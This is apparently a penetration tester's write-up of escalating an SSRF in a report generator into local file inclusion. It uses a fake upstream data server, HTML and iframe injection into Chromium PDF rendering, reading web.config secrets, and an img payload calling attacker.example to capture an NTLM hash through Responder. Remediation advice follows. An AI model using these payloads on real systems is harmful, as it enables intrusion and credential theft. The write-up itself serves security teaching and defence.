I think every penetration tester has a story about the one that got away. The bug that LOOKED exploitable, but wasn’t. The ones where you’re eating into reporting time, madly trying to put something together, and getting absolutely nothing for your efforts. SSRF is a neat bug because it jumps trust boundaries. You go from being a user of a web application to someone on the inside, someone who can reach out and touch things on behalf of the vulnerable server. Exploiting SSRF beyond a proof-of-concept callback is often tricky because the impact depends largely on the environment that internal request is made from.
The classic example of an immediately exploitable SSRF vulnerability is one targeting cloud metadata services to retrieve credentials. This has the added bonus of occasionally turning into a cloud-wide security event as well. But what else can we do to increase the impact of SSRF?
There’s some great service-specific research out there, but this still requires knowledge of those internal endpoints. What if you don’t have a juicy metadata service and you know nothing about their internal network (or it’s out of scope)? This is the story about how I was able to finally use an SSRF technique that had taunted me mercilessly on a previous test to gain LFI on a system.
SSRF-In-The-Middle: Exploring for more
I was testing a reporting application. Users choose the report to run, ensure the preview looks good, and then collect their report in its chosen format from an inbox. The name of the application suggested that it handled reporting for multiple other systems, which would help explain the “bring your own URL” feature. When generating a report, a request is sent with a number of URL parameters that determine where the server should retrieve style information and data prior to generating the report. As you might have guessed, all of these were vulnerable to SSRF.
I chose to inject into the dataServerUrl parameter since that seemed like it would give me the most flexibility. I caught my initial callback with Collaborator, which gave me the body of the POST request made on my behalf to the report data server:
At this point, we have a medium-severity finding and can helpfully include a link to Mr. Tsai’s aforementioned post to flesh out the potential impact on a client’s environment. But I was on day two of a multi-week test and THIS was my second crack at the one that got away.
The attack I’m about to walk through is a sort of man-in-the-middle attack. Here’s how the legitimate request works:
- User requests a report from ServerA.
- ServerA requests report data from ServerB.
- ServerA generates the report and returns it to the user in their chosen format.
- The user picks up their report from the inbox.
The user doesn’t normally see steps 2 and 3 and, even if they can communicate with ServerB, they don’t necessarily know the format of the request required to get a response. And even if they did, they’re still just left with whatever data they were going to receive eventually anyway. That seems boring.
But this is SSRF! We can tell the server where to go. What if we were ServerB? Then we could inject content into the response and into any downstream processing that might happen. This, my friends, is that.
The body of my initial Collaborator callback contained everything I needed to get a response out of my ServerB. I used the body of the Collaborator request to send a request of my own to the original reporting server specified in the dataServerUrl parameter. The server helpfully responded with exactly the response the application would need to generate a report.
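To make that replay step concrete, here’s a rough sketch; every URL, header, and body value below is an invented placeholder, since the real ones come straight from your own Collaborator callback:

```python
# Hypothetical sketch of replaying the captured request. All values below
# are placeholders -- the real body and content type come from the
# Collaborator callback, and the URL is whatever dataServerUrl pointed at.

def build_replay_request(target_url: str, captured_body: str,
                         content_type: str = "application/json") -> dict:
    """Package the captured body so it can be re-sent verbatim,
    e.g. with requests.post(**build_replay_request(...))."""
    return {
        "url": target_url,
        "data": captured_body.encode(),
        "headers": {"Content-Type": content_type},
    }

# Body observed in the Collaborator callback (placeholder):
captured = '{"reportId": "1234", "format": "pdf"}'
replay = build_replay_request("https://reports.internal.example/data", captured)
```

Sending that with `requests.post(**replay)` against the legitimate data server gives you the exact response the application expects back.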
With the expected response in hand, I created a dummy reporting server using Flask that would serve the data in the expected format to anyone who asked. I re-ran my report, this time injecting the URL for my Flask server. The report ran perfectly and I could now start poking around the downstream reporting server by modifying the relevant parts of the data being served.
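A minimal sketch of what that Flask stand-in might look like, assuming (purely for illustration) a JSON response format; the canned payload and field names are invented, since in practice you serve back an exact copy of the legitimate response and then mutate one field at a time:

```python
# Minimal Flask stand-in for ServerB -- field names and payload invented.
# In practice CANNED_RESPONSE starts as a verbatim copy of the legitimate
# data server's response; mutate individual fields to probe the renderer.
from flask import Flask, jsonify

app = Flask(__name__)

CANNED_RESPONSE = {
    "title": "Quarterly Report",
    "rows": [{"name": "test-row"}],
}

# Answer every path and method the reporting server might use.
@app.route("/", defaults={"path": ""}, methods=["GET", "POST"])
@app.route("/<path:path>", methods=["GET", "POST"])
def serve(path):
    return jsonify(CANNED_RESPONSE)

# To run: app.run(host="0.0.0.0", port=8080), then point dataServerUrl here.
```

Once the report generates cleanly from this server, each field becomes an injection point into the downstream rendering.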
The metadata of the generated PDFs showed that Chromium was being used to create the report:
Since Chromium’s PDF generation works on HTML documents (understandably), it meant that my report content was first being rendered as HTML, at which point Chromium would turn it into a PDF before the application finally delivered it to the user.
I like to review my knowledgebase entries on a given technique when working through a test and since we were dealing with SSRF and PDFs, I started with @NahamSec and @daeken’s presentation Owning the Clout Through SSRF and PDF Generators. Unfortunately, none of the techniques outlined there worked, so I shelved it for the time being and moved on.
```
XX<script>document.write('xx' + window.location)</script>YY
```
By this point, I’d been banging away at this for a while and decided to take a break for food and sleep. As always, sleep proved useful and my fresh set of eyes unearthed a nice juicy facepalm. There were two report generation options I’d been using to kick off each test iteration. I’d been alternating between the two and had been getting intermittent errors. I went back to square one and realized that I only got errors with option #2.
I retraced my steps using only the working request (hacker level: 1000) and started with an iframe injection:
I was rewarded for my efforts with a beautiful baby iframe:
With a bit of care and feeding, my iframe grew to fill the whole page and I could now peruse the entire hosts file in style:
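The exact payload isn’t reproduced here, but the technique boils down to pointing an iframe at a file:// URL and sizing it to fill the page. A representative (not the actual) payload, assuming a Windows host:

```html
<!-- Representative payload served in the report data. The renderer runs
     server-side with local filesystem access, so file:// URLs resolve
     against the reporting server's own disk. -->
<iframe src="file:///C:/Windows/System32/drivers/etc/hosts"
        style="width:100vw;height:100vh;border:0"></iframe>
```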
LFI is much more exciting than SSRF because it can lead to the disclosure of juicy filesystem secrets and often RCE. My next stop was the web.config file. I traversed up the path discovered by my window.location injection and got lucky:
The machineKey value is especially interesting since it’s used for all sorts of encryption in .NET, including view state (see Machine Key Explained to learn more about it, and Exploiting Deserialisation in ASP.NET via ViewState for how you might gain RCE with a stolen one). In my case, view state was not used, so this was not possible. The connection string was also interesting, but I didn’t find a use for it.
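For readers who haven’t rifled through one before, the interesting sections of a web.config look roughly like this; every value below is invented:

```xml
<!-- Illustrative web.config fragment (all values invented). -->
<configuration>
  <connectionStrings>
    <add name="ReportDb"
         connectionString="Server=sql01;Database=Reports;User Id=svc_report;Password=..." />
  </connectionStrings>
  <system.web>
    <machineKey validationKey="ABC123..." decryptionKey="DEF456..."
                validation="SHA1" decryption="AES" />
  </system.web>
</configuration>
```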
But wait, there’s more! We can read paths from the local filesystem, what about paths from a remote one? I fired up Responder on my evil reporting server and…
Although the hash appears to be for a computer account, this would likely still be sufficient for some limited domain queries, assuming you found a way to relay it to an AD-integrated service. And there you have it. The story of how I caught the one that got away and flipped an otherwise-vanilla SSRF into a much more interesting LFI.
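One representative way (not necessarily the exact payload used) to coax that outbound authentication: serve report content referencing a resource on the attacker’s host, which a Windows renderer will try to fetch over SMB, handing its NetNTLM handshake to the waiting Responder instance. Hostname invented:

```html
<!-- Representative payload (attacker hostname invented): on Windows,
     file:// with a remote hostname resolves as a UNC path, so the
     renderer authenticates to the attacker's SMB listener. -->
<img src="file://attacker.example/share/x.png">
```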
Yes, Mr. Breaker, but how would I stop someone from doing this to my beautiful web application? Ehhh…
I’m kidding, of course I included this section in the first draft of this post! There are a lot of moving parts here. Starting from the first request:
- User-controllable reporting URL.
- No whitelisting on acceptable URL values.
- User-accessible ServerB.
- HTML report generation.
- PDF creation.
Conveniently enough, this is a good prioritized list for remediation:
- Allowing a user to supply the URL is always going to be dangerous, so if you can avoid that, do.
- If you must provide a URL in your request, say, when you’re using the same system to generate reports with data from multiple other servers, as was the case here, then enforce a whitelist of acceptable values (if using regex, remember to anchor the start and end of the string so that an attacker-controlled URL merely containing an allowed value doesn’t slip through).
- Next, this attack would not have been possible (or would have been much harder) had I not been able to access the legitimate ServerB to obtain a valid response.
- Rendering a report as HTML certainly allows for a lot of flexibility in report generation; you can design it much as you would any other page and don’t need a third-party product to do so. It perhaps provides too much flexibility. If you have been unable to implement any of the fixes so far, you must treat all of your user input as untrusted. If you’re evaluating HTML tags, define a whitelist of safe tags, and encode the rest.
- Fear not! We still have options even if you must allow all of the dangerous behaviour thus far. The actual impact of this attack was caused by there being something interesting on the local filesystem to embed in my iframe. If the report was being generated in a container or some other intentionally-boring-and-secure option, it would have been far less interesting.
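The whitelist point above deserves a concrete illustration of why anchoring matters; domain names below are invented:

```python
import re

# Whitelist pattern for acceptable dataServerUrl values (invented domain).
ALLOWED = r"https://reports\.example\.com/.*"

def is_allowed_unanchored(url: str) -> bool:
    # BUG: re.search matches anywhere in the string, so any URL that
    # merely *contains* an allowed value slips through.
    return re.search(ALLOWED, url) is not None

def is_allowed_anchored(url: str) -> bool:
    # re.fullmatch pins the pattern to the entire string.
    return re.fullmatch(ALLOWED, url) is not None

evil = "https://evil.example/?next=https://reports.example.com/x"
print(is_allowed_unanchored(evil))  # True  -- bypass
print(is_allowed_anchored(evil))    # False -- blocked
```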
As always, bonus points are awarded for defense in depth. Most of these controls can be implemented with (almost?) no impact on usability and a minor increase in complexity.